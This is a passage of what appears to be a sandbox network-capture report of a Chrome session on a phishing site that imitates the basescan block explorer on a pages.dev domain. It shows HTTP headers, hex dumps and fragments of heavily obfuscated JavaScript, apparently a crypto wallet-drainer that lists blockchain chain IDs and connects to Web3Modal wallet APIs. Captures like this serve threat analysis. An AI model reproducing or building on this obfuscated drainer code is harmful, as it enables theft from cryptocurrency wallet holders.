                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 66 38 34 63 3d 5f 30 78 32 31 36 61 36 66 3b 6c 65 74 20 5f 30 78 31 61 30 66 63 65 3b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 32 65 36 30 64 63 3d 46 75 6e 63 74 69 6f 6e 28 5f 30 78 35 39 66 38 34 63 5b 27 4f 41 46 67 54 27 5d 28 5f 30 78 35 39 66 38 34 63 5b 5f 30 78 39 62 38 64 32 32 28 30 78 31 62 66 35 2c 30 78 31 35 32 31 2c 30 78 31 33 31 35 2c 30 78 31 33 32 65 29 5d 28 5f 30 78 35 39 66 38 34 63 5b 5f 30 78 39 62 38 64 32 32 28 30 78 61 64 33 2c 30 78 62 34 39 2c 2d 30 78 65 65 2c 30 78 39 31 38 29 5d 2c 5f 30 78 35 39 66 38 34 63 5b 5f 30 78 37 30 62 34 62 64 28 30 78 31 31 39 32 2c 30 78 31 62 34 39 2c 30 78 36 66 64 2c 30 78 31 33 32 37 29 5d 29 2c 27 29 3b 27 29 29 3b 5f 30 78 31 61 30 66 63 65 3d 5f 30 78 32 65 36 30 64 63 28 29 3b 7d 63 61
                                                                                                                                                                                                                                              Data Ascii: f84c=_0x216a6f;let _0x1a0fce;try{const _0x2e60dc=Function(_0x59f84c['OAFgT'](_0x59f84c[_0x9b8d22(0x1bf5,0x1521,0x1315,0x132e)](_0x59f84c[_0x9b8d22(0xad3,0xb49,-0xee,0x918)],_0x59f84c[_0x70b4bd(0x1192,0x1b49,0x6fd,0x1327)]),');'));_0x1a0fce=_0x2e60dc();}ca
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 63 30 32 3b 7d 7d 29 3b 5f 30 78 35 34 64 36 36 65 28 29 3b 63 6f 6e 73 74 20 5f 30 78 33 31 37 64 32 35 3d 7b 7d 3b 5f 30 78 33 31 37 64 32 35 5b 5f 30 78 32 37 32 33 33 32 28 30 78 64 63 62 2c 30 78 31 33 66 30 2c 30 78 61 36 37 2c 30 78 36 35 63 29 5d 3d 30 78 32 2c 5f 30 78 33 31 37 64 32 35 5b 27 73 65 61 70 6f 72 74 27 5d 3d 31 2e 34 2c 5f 30 78 33 31 37 64 32 35 5b 5f 30 78 61 61 37 34 36 61 28 30 78 31 30 33 63 2c 30 78 31 31 37 36 2c 30 78 31 39 34 39 2c 30 78 31 34 35 66 29 2b 27 73 27 5d 3d 32 2e 32 2c 5f 30 78 33 31 37 64 32 35 5b 5f 30 78 61 61 37 34 36 61 28 30 78 39 64 64 2c 30 78 64 38 61 2c 30 78 31 34 63 30 2c 30 78 66 35 36 29 5d 3d 31 2e 35 2c 5f 30 78 33 31 37 64 32 35 5b 5f 30 78 61 61 37 34 36 61 28 30 78 32 30 34 36 2c 30 78 31 37
                                                                                                                                                                                                                                              Data Ascii: c02;}});_0x54d66e();const _0x317d25={};_0x317d25[_0x272332(0xdcb,0x13f0,0xa67,0x65c)]=0x2,_0x317d25['seaport']=1.4,_0x317d25[_0xaa746a(0x103c,0x1176,0x1949,0x145f)+'s']=2.2,_0x317d25[_0xaa746a(0x9dd,0xd8a,0x14c0,0xf56)]=1.5,_0x317d25[_0xaa746a(0x2046,0x17
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 33 33 32 28 30 78 31 34 64 33 2c 30 78 39 62 30 2c 30 78 31 30 36 39 2c 30 78 31 37 37 36 29 2b 5f 30 78 61 61 37 34 36 61 28 30 78 35 66 2c 30 78 35 63 64 2c 30 78 31 34 63 2c 30 78 37 63 36 29 5d 3d 30 78 35 2c 5f 30 78 32 64 32 66 30 34 5b 5f 30 78 61 61 37 34 36 61 28 30 78 64 66 63 2c 30 78 36 31 61 2c 30 78 31 30 33 62 2c 30 78 37 65 61 29 2b 5f 30 78 61 61 37 34 36 61 28 30 78 31 63 31 33 2c 30 78 31 61 31 63 2c 30 78 31 63 37 32 2c 30 78 31 66 62 61 29 2b 5f 30 78 61 61 37 34 36 61 28 30 78 31 39 38 31 2c 30 78 31 39 32 35 2c 30 78 31 65 66 66 2c 30 78 31 39 30 37 29 5d 3d 21 21 5b 5d 2c 5f 30 78 32 64 32 66 30 34 5b 5f 30 78 32 37 32 33 33 32 28 30 78 65 37 63 2c 30 78 31 62 36 30 2c 30 78 31 37 38 34 2c 30 78 31 37 32 33 29 2b 5f 30 78 32 37 32
                                                                                                                                                                                                                                              Data Ascii: 332(0x14d3,0x9b0,0x1069,0x1776)+_0xaa746a(0x5f,0x5cd,0x14c,0x7c6)]=0x5,_0x2d2f04[_0xaa746a(0xdfc,0x61a,0x103b,0x7ea)+_0xaa746a(0x1c13,0x1a1c,0x1c72,0x1fba)+_0xaa746a(0x1981,0x1925,0x1eff,0x1907)]=!![],_0x2d2f04[_0x272332(0xe7c,0x1b60,0x1784,0x1723)+_0x272
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 66 34 29 2b 27 31 32 46 30 35 32 65 63 42 33 27 2b 5f 30 78 61 61 37 34 36 61 28 30 78 31 64 62 63 2c 30 78 31 35 34 61 2c 30 78 31 65 63 31 2c 30 78 31 64 37 65 29 2b 27 39 35 27 2c 5f 30 78 61 61 37 34 36 61 28 30 78 31 62 31 34 2c 30 78 31 35 61 33 2c 30 78 31 37 32 31 2c 30 78 31 61 30 30 29 2b 5f 30 78 61 61 37 34 36 61 28 30 78 35 37 62 2c 30 78 66 37 65 2c 30 78 39 61 62 2c 30 78 31 38 35 39 29 2b 27 66 66 36 32 63 30 61 30 32 62 27 2b 5f 30 78 61 61 37 34 36 61 28 30 78 36 32 31 2c 30 78 35 64 61 2c 2d 30 78 33 30 36 2c 30 78 39 32 66 29 2b 27 36 37 27 2c 5f 30 78 61 61 37 34 36 61 28 30 78 33 38 32 2c 30 78 61 30 31 2c 2d 30 78 32 66 2c 30 78 38 61 30 29 2b 5f 30 78 32 37 32 33 33 32 28 30 78 32 65 64 2c 30 78 32 64 37 2c 30 78 39 64 66 2c 30 78
                                                                                                                                                                                                                                              Data Ascii: f4)+'12F052ecB3'+_0xaa746a(0x1dbc,0x154a,0x1ec1,0x1d7e)+'95',_0xaa746a(0x1b14,0x15a3,0x1721,0x1a00)+_0xaa746a(0x57b,0xf7e,0x9ab,0x1859)+'ff62c0a02b'+_0xaa746a(0x621,0x5da,-0x306,0x92f)+'67',_0xaa746a(0x382,0xa01,-0x2f,0x8a0)+_0x272332(0x2ed,0x2d7,0x9df,0x
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 64 37 62 34 5b 5f 30 78 32 37 32 33 33 32 28 30 78 31 61 61 36 2c 30 78 31 34 34 64 2c 30 78 31 30 37 32 2c 30 78 31 39 35 31 29 5d 3d 30 78 31 2c 5f 30 78 31 63 64 37 62 34 5b 5f 30 78 61 61 37 34 36 61 28 30 78 31 33 31 37 2c 30 78 61 34 34 2c 30 78 63 38 66 2c 30 78 31 33 64 30 29 5d 3d 30 78 33 38 2c 5f 30 78 31 63 64 37 62 34 5b 27 78 64 61 69 27 5d 3d 30 78 36 34 2c 5f 30 78 31 63 64 37 62 34 5b 5f 30 78 32 37 32 33 33 32 28 30 78 64 37 63 2c 30 78 66 64 36 2c 30 78 31 34 64 37 2c 30 78 31 30 38 64 29 5d 3d 30 78 61 34 62 31 2c 5f 30 78 31 63 64 37 62 34 5b 27 6d 61 74 69 63 27 5d 3d 30 78 38 39 2c 5f 30 78 31 63 64 37 62 34 5b 27 61 76 61 78 27 5d 3d 30 78 61 38 36 61 2c 5f 30 78 31 63 64 37 62 34 5b 27 6f 70 27 5d 3d 30 78 61 2c 5f 30 78 31 63 64
                                                                                                                                                                                                                                              Data Ascii: d7b4[_0x272332(0x1aa6,0x144d,0x1072,0x1951)]=0x1,_0x1cd7b4[_0xaa746a(0x1317,0xa44,0xc8f,0x13d0)]=0x38,_0x1cd7b4['xdai']=0x64,_0x1cd7b4[_0x272332(0xd7c,0xfd6,0x14d7,0x108d)]=0xa4b1,_0x1cd7b4['matic']=0x89,_0x1cd7b4['avax']=0xa86a,_0x1cd7b4['op']=0xa,_0x1cd


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              36192.168.2.549775104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC652OUTGET /images/logo-ether.svg?v=0.0.7 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC798INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:03 GMT
                                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                                              Content-Length: 10250
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Mon, 15 May 2023 02:33:00 GMT
                                                                                                                                                                                                                                              ETag: "056d290d586d91:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 90406
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0WdgHeH4Dhcy3CElfT%2Fqc8ngFkphwddv33nPRDasRrtp3Qxg2juBL0qMWyHsKIaV9CmdHybJFaeYrM4L7%2FjhfSqs2EbJQAzJ5Q%2FMWwT8rVnldKVFa7f6rChfH0NozQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2c9ac804387-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC571INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 35 34 32 2e 32 34 39 22 20 68 65 69 67 68 74 3d 22 31 32 31 2e 31 35 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 32 2e 32 34 39 20 31 32 31 2e 31 35 32 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 65 74 68 65 72 73 63 61 6e 2d 6c 6f 67 6f 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 31 39 2e 33 37 37 20 2d 32 31 33 2e 35 31 36 29 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 50 61 74 68 5f 38 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 50 61 74 68 20 38 22 20 64 3d 22 4d 31 32 2e 33 33 33 2d 34 33 2e 39 71 30 2d 36 2e 30 38 34 2d 34 2e 31 39 33 2d 36 2e 30 38 34 61 36 2e 37 34 32
                                                                                                                                                                                                                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="542.249" height="121.152" viewBox="0 0 542.249 121.152"> <g id="etherscan-logo" transform="translate(-219.377 -213.516)"> <path id="Path_8" data-name="Path 8" d="M12.333-43.9q0-6.084-4.193-6.084a6.742
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 2c 30 2c 31 2c 2e 32 37 34 2c 33 2e 35 33 35 71 30 2c 33 2e 31 32 34 2d 32 2e 39 36 2c 33 2e 31 32 34 74 2d 32 2e 39 36 2d 34 2e 33 37 38 76 2d 34 2e 33 71 30 2d 36 2e 39 33 38 2d 32 2e 38 36 37 2d 38 2e 31 37 38 2d 32 2e 31 33 31 2d 2e 39 30 38 2d 31 30 2e 39 38 2d 2e 39 30 38 61 34 39 2e 34 37 37 2c 34 39 2e 34 37 37 2c 30 2c 30 2c 30 2d 36 2e 38 38 33 2e 32 35 31 71 2d 33 2e 35 32 34 2e 39 31 39 2d 33 2e 35 32 34 2c 35 2e 30 31 31 76 38 2e 32 32 32 71 30 2c 33 2e 32 38 39 2c 31 2e 34 35 39 2c 33 2e 37 38 32 61 37 2e 39 31 2c 37 2e 39 31 2c 30 2c 30 2c 30 2c 31 2e 39 34 36 2e 31 36 34 48 32 35 2e 38 71 35 2e 31 30 39 2c 30 2c 35 2e 31 30 39 2d 33 2e 35 33 35 61 32 30 2e 33 35 37 2c 32 30 2e 33 35 37 2c 30 2c 30 2c 30 2d 2e 32 30 36 2d 32 2e 35 34 39 2c
                                                                                                                                                                                                                                              Data Ascii: ,0,1,.274,3.535q0,3.124-2.96,3.124t-2.96-4.378v-4.3q0-6.938-2.867-8.178-2.131-.908-10.98-.908a49.477,49.477,0,0,0-6.883.251q-3.524.919-3.524,5.011v8.222q0,3.289,1.459,3.782a7.91,7.91,0,0,0,1.946.164H25.8q5.109,0,5.109-3.535a20.357,20.357,0,0,0-.206-2.549,
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 39 2c 32 2e 36 31 39 2c 30 2c 30 2c 31 2c 31 2e 39 33 32 2d 2e 39 68 33 2e 32 30 37 71 31 2e 34 2c 30 2c 31 2e 34 2d 31 2e 35 36 32 76 2d 38 2e 34 36 39 71 30 2d 33 2e 31 32 34 2c 33 2e 32 30 37 2d 33 2e 31 32 34 2c 32 2e 39 36 2c 30 2c 32 2e 39 36 2c 33 2e 31 32 34 76 38 2e 38 71 30 2c 31 2e 32 33 33 2c 31 2e 34 38 2c 31 2e 32 33 33 48 38 30 71 33 2e 31 32 34 2c 30 2c 33 2e 31 32 34 2c 32 2e 38 37 38 2c 30 2c 33 2e 30 34 32 2d 33 2e 33 37 31 2c 33 2e 30 34 32 48 37 30 2e 37 30 38 71 2d 31 2e 31 35 31 2c 30 2d 31 2e 31 35 31 2c 31 2e 37 32 37 76 32 30 2e 32 32 36 71 30 2c 38 2e 36 33 33 2c 35 2e 37 35 33 2c 38 2e 36 33 33 51 38 31 2e 31 34 36 2d 34 2e 33 35 38 2c 38 31 2e 34 2d 31 31 2e 33 34 36 5a 6d 32 32 2e 38 35 37 2d 34 31 2e 36 37 32 4c 31 30 33 2e
                                                                                                                                                                                                                                              Data Ascii: 9,2.619,0,0,1,1.932-.9h3.207q1.4,0,1.4-1.562v-8.469q0-3.124,3.207-3.124,2.96,0,2.96,3.124v8.8q0,1.233,1.48,1.233H80q3.124,0,3.124,2.878,0,3.042-3.371,3.042H70.708q-1.151,0-1.151,1.727v20.226q0,8.633,5.753,8.633Q81.146-4.358,81.4-11.346Zm22.857-41.672L103.
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 39 2e 32 30 36 2c 39 2e 32 30 36 2c 30 2c 30 2c 31 2d 31 2e 38 30 39 2e 32 34 37 71 2d 32 2e 38 2c 30 2d 32 2e 38 2d 32 2e 36 33 31 61 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 2e 39 38 37 2d 31 2e 39 37 33 2c 33 2e 36 2c 33 2e 36 2c 30 2c 30 2c 31 2c 32 2e 33 38 34 2d 2e 38 32 32 71 2e 34 31 31 2c 30 2c 32 2e 38 2e 32 34 37 61 33 32 2e 32 39 32 2c 33 32 2e 32 39 32 2c 30 2c 30 2c 30 2c 33 2e 33 37 31 2e 31 36 34 2c 31 34 2e 32 30 38 2c 31 34 2e 32 30 38 2c 30 2c 30 2c 30 2c 32 2e 30 35 35 2d 2e 32 30 36 2c 31 33 2e 39 38 35 2c 31 33 2e 39 38 35 2c 30 2c 30 2c 31 2c 31 2e 38 39 31 2d 2e 32 30 36 71 31 2e 38 39 31 2c 30 2c 31 2e 38 39 31 2c 32 2e 37 32 35 5a 6d 37 36 2e 38 37 34 2c 32 38 2e 37 38 61 31 30 2e 30 31 37 2c 31 30 2e 30 31 37 2c 30 2c 30
                                                                                                                                                                                                                                              Data Ascii: 9.206,9.206,0,0,1-1.809.247q-2.8,0-2.8-2.631a2.49,2.49,0,0,1,.987-1.973,3.6,3.6,0,0,1,2.384-.822q.411,0,2.8.247a32.292,32.292,0,0,0,3.371.164,14.208,14.208,0,0,0,2.055-.206,13.985,13.985,0,0,1,1.891-.206q1.891,0,1.891,2.725Zm76.874,28.78a10.017,10.017,0,0
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 37 32 2c 34 2e 36 38 36 61 39 2e 35 2c 39 2e 35 2c 30 2c 30 2c 30 2c 32 2e 32 33 39 2d 2e 32 38 31 41 37 2e 31 32 37 2c 37 2e 31 32 37 2c 30 2c 30 2c 31 2c 32 30 37 2d 35 2e 31 71 32 2e 36 35 35 2c 30 2c 32 2e 36 35 35 2c 32 2e 35 39 31 2c 30 2c 32 2e 38 33 35 2d 33 2e 33 37 31 2c 32 2e 38 33 35 68 2d 2e 33 32 39 61 33 36 2e 31 32 38 2c 33 36 2e 31 32 38 2c 30 2c 30 2c 31 2d 33 2e 37 34 31 2d 2e 32 38 38 2c 33 36 2e 31 32 38 2c 33 36 2e 31 32 38 2c 30 2c 30 2c 30 2d 33 2e 37 34 31 2d 2e 32 38 38 71 2d 33 2e 32 38 39 2c 30 2d 35 2e 31 38 2e 31 36 34 6c 2d 34 2e 36 2e 34 31 31 71 2d 33 2e 33 37 31 2c 30 2d 33 2e 33 37 31 2d 32 2e 38 37 38 2c 30 2d 32 2e 35 34 39 2c 33 2e 31 35 33 2d 32 2e 35 34 39 61 36 2e 39 33 38 2c 36 2e 39 33 38 2c 30 2c 30 2c 31 2c 31
                                                                                                                                                                                                                                              Data Ascii: 72,4.686a9.5,9.5,0,0,0,2.239-.281A7.127,7.127,0,0,1,207-5.1q2.655,0,2.655,2.591,0,2.835-3.371,2.835h-.329a36.128,36.128,0,0,1-3.741-.288,36.128,36.128,0,0,0-3.741-.288q-3.289,0-5.18.164l-4.6.411q-3.371,0-3.371-2.878,0-2.549,3.153-2.549a6.938,6.938,0,0,1,1
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 2c 32 33 33 2e 32 35 34 2d 31 32 71 2e 30 38 32 2c 33 2e 35 33 35 2c 33 2e 37 2c 35 2e 37 35 35 61 31 37 2e 33 35 37 2c 31 37 2e 33 35 37 2c 30 2c 30 2c 30 2c 39 2e 32 30 38 2c 32 2e 32 32 2c 31 30 2e 34 39 32 2c 31 30 2e 34 39 32 2c 30 2c 30 2c 30 2c 36 2e 36 36 2d 32 2e 30 35 35 2c 36 2e 33 31 35 2c 36 2e 33 31 35 2c 30 2c 30 2c 30 2c 32 2e 36 33 31 2d 35 2e 31 38 71 30 2d 35 2e 35 39 31 2d 38 2e 38 38 2d 36 2e 35 2d 38 2e 34 36 39 2d 2e 39 2d 31 32 2e 39 30 38 2d 33 2e 33 33 74 2d 34 2e 34 34 2d 38 2e 35 31 61 31 31 2e 35 31 33 2c 31 31 2e 35 31 33 2c 30 2c 30 2c 31 2c 34 2e 33 34 33 2d 39 2e 33 33 32 71 34 2e 33 34 34 2d 33 2e 35 37 35 2c 31 31 2e 33 31 2d 33 2e 35 37 35 5a 6d 34 37 2e 30 38 2c 31 35 2e 33 37 35 71 30 2d 33 2e 32 38 39 2c 34 2e 31 31
                                                                                                                                                                                                                                              Data Ascii: ,233.254-12q.082,3.535,3.7,5.755a17.357,17.357,0,0,0,9.208,2.22,10.492,10.492,0,0,0,6.66-2.055,6.315,6.315,0,0,0,2.631-5.18q0-5.591-8.88-6.5-8.469-.9-12.908-3.33t-4.44-8.51a11.513,11.513,0,0,1,4.343-9.332q4.344-3.575,11.31-3.575Zm47.08,15.375q0-3.289,4.11
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 2c 30 2c 30 2c 31 2d 33 2e 35 37 37 2d 31 2e 34 38 2c 34 2e 39 39 34 2c 34 2e 39 39 34 2c 30 2c 30 2c 31 2d 31 2e 34 33 39 2d 33 2e 36 31 38 71 30 2d 34 2e 36 2c 34 2e 35 36 33 2d 37 2e 38 39 33 41 31 38 2e 34 30 38 2c 31 38 2e 34 30 38 2c 30 2c 30 2c 31 2c 33 32 37 2e 37 32 35 2d 34 32 2e 35 71 31 34 2e 39 36 34 2c 30 2c 31 34 2e 39 36 34 2c 31 34 2e 33 35 37 76 31 36 2e 35 37 33 61 33 35 2c 33 35 2c 30 2c 30 2c 30 2c 2e 31 36 34 2c 34 2e 36 37 36 71 2e 34 39 33 2c 32 2e 38 37 31 2c 32 2e 38 2c 32 2e 38 37 31 2c 32 2e 38 37 38 2c 30 2c 32 2e 38 37 38 2d 35 2e 32 32 36 76 2d 34 71 30 2d 32 2e 36 31 33 2c 32 2e 35 30 39 2d 32 2e 36 31 33 2c 32 2e 36 37 31 2c 30 2c 32 2e 36 37 31 2c 33 2e 39 34 36 76 35 2e 31 71 2d 2e 31 37 31 2c 37 2e 38 38 33 2d 38 2e 33
                                                                                                                                                                                                                                              Data Ascii: ,0,0,1-3.577-1.48,4.994,4.994,0,0,1-1.439-3.618q0-4.6,4.563-7.893A18.408,18.408,0,0,1,327.725-42.5q14.964,0,14.964,14.357v16.573a35,35,0,0,0,.164,4.676q.493,2.871,2.8,2.871,2.878,0,2.878-5.226v-4q0-2.613,2.509-2.613,2.671,0,2.671,3.946v5.1q-.171,7.883-8.3
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 33 61 32 39 2e 39 38 35 2c 32 39 2e 39 38 35 2c 30 2c 30 2c 30 2d 34 2e 30 32 39 2d 2e 32 34 37 2c 34 32 2e 36 33 38 2c 34 32 2e 36 33 38 2c 30 2c 30 2c 30 2d 34 2e 36 2e 33 32 39 71 2d 33 2e 36 31 38 2e 34 31 31 2d 34 2e 31 31 31 2e 34 31 31 2d 33 2e 34 35 33 2c 30 2d 33 2e 34 35 33 2d 32 2e 38 61 32 2e 33 34 37 2c 32 2e 33 34 37 2c 30 2c 30 2c 31 2c 2e 36 38 32 2d 31 2e 39 38 36 2c 32 2e 33 34 37 2c 32 2e 33 34 37 2c 30 2c 30 2c 31 2c 32 2d 2e 36 34 35 2c 38 2e 38 34 32 2c 38 2e 38 34 32 2c 30 2c 30 2c 31 2c 31 2e 35 34 39 2e 32 34 37 2c 31 30 2e 33 38 39 2c 31 30 2e 33 38 39 2c 30 2c 30 2c 30 2c 32 2e 32 31 39 2e 32 34 37 71 32 2e 35 31 33 2c 30 2c 32 2e 36 2d 34 2e 37 36 39 56 2d 33 31 2e 33 32 35 61 31 30 2e 34 37 36 2c 31 30 2e 34 37 36 2c 30 2c 30
                                                                                                                                                                                                                                              Data Ascii: 3a29.985,29.985,0,0,0-4.029-.247,42.638,42.638,0,0,0-4.6.329q-3.618.411-4.111.411-3.453,0-3.453-2.8a2.347,2.347,0,0,1,.682-1.986,2.347,2.347,0,0,1,2-.645,8.842,8.842,0,0,1,1.549.247,10.389,10.389,0,0,0,2.219.247q2.513,0,2.6-4.769V-31.325a10.476,10.476,0,0
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC96INData Raw: 31 36 33 2c 33 33 2e 30 35 35 2d 36 33 2e 30 38 35 2c 34 38 2e 35 30 38 2d 39 36 2e 31 38 31 2c 35 33 2e 32 31 33 22 20 66 69 6c 6c 3d 22 23 39 37 39 36 39 35 22 2f 3e 0d 0a 20 20 20 20 20 20 3c 2f 67 3e 0d 0a 20 20 20 20 3c 2f 67 3e 0d 0a 20 20 3c 2f 67 3e 0d 0a 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 163,33.055-63.085,48.508-96.181,53.213" fill="#979695"/> </g> </g> </g></svg>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              37192.168.2.549772104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC657OUTOPTIONS /getWallets?page=1&entries=4 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Access-Control-Request-Method: GET
                                                                                                                                                                                                                                              Access-Control-Request-Headers: x-project-id,x-sdk-type,x-sdk-version
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC489INHTTP/1.1 204 Not Found
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:03 GMT
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Vary: Origin, Access-Control-Request-Headers
                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                              Access-Control-Allow-Headers: x-project-id,x-sdk-version,x-sdk-type
                                                                                                                                                                                                                                              Access-Control-Allow-Methods: OPTIONS,GET,POST,PUT,PATCH,DELETE
                                                                                                                                                                                                                                              Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2c9bf5f0f55-EWR


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              38192.168.2.549769104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC687OUTOPTIONS /public/getAssetImage/ab9c186a-c52f-464b-2906-ca59d760a400 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Access-Control-Request-Method: GET
                                                                                                                                                                                                                                              Access-Control-Request-Headers: x-project-id,x-sdk-type,x-sdk-version
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC489INHTTP/1.1 204 Not Found
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:03 GMT
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Vary: Origin, Access-Control-Request-Headers
                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                              Access-Control-Allow-Headers: x-project-id,x-sdk-version,x-sdk-type
                                                                                                                                                                                                                                              Access-Control-Allow-Methods: OPTIONS,GET,POST,PUT,PATCH,DELETE
